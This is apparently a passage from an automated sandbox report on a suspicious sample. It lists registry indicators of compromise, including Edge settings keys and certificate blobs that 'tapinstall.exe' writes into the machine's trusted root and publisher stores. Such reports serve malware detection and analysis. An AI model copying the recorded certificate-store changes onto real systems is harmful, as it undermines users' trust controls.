\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-384 = "Namibia Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs DrvInst.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-401 = "Arabic Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-448 = "Azerbaijan Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-371 = "Jerusalem Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2512 = "Lord Howe Standard Time" mask_svc.exe -
Modifies registry class 64 IoCs
Processes:
MicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdge.exe4662584.51MicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\SignaturePolicy = 06000000 4662584.51 Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus 4662584.51 Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8" 4662584.51 Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 1f4dfb24101cd701 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IETld\LowMic MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows\AllowInPrivate MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{A3CAFE4A-47A1-4F40-B317-0A3612AABA64} = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionI MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\LowMic MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DeviceId = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberCompleted = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CacheLimit = "256000" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content\CacheLimit = "256000" 4662584.51 Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionI = "{F096AEE2-211D-4346-9576-A33D6B0A8E37}" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\AdapterInfo = "vendorId=\"0x1414\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.15063.0\"hypervisor=\"No Hypervisor (No SLAT)\"" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\FirstRecoveryTime = 6c3a3b6c55add601 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\MigrationTime = 6c3a3b6c55add601 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\CIPolicyState = "0" 4662584.51 Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "395205405" Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{D4EBF30A-CCE1-4014-885E-A4EBD5519E41} = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionHigh = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 5cedd94c101cd701 Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar\WebBrowser MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = b9ef832c101cd701 MicrosoftEdge.exe -
Processes:
tapinstall.exeZHivecanaepae.exevpn.tmpaskinstall29.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c00000001000000040000000008000004000000010000001000000087ce0b7b2a0e4900e158719b37a893720300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 tapinstall.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 0f00000001000000200000002dc1a6a6cb0cb42f7e0d2c56f38bc7decbccd143405f669070ce130f9249ba48030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f tapinstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC tapinstall.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 0f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b060105050703016200000001000000200000001465fa205397b876faa6f0a9958e5590e40fcc7faa4fb7c2c8677521fb5fb658140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a2000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8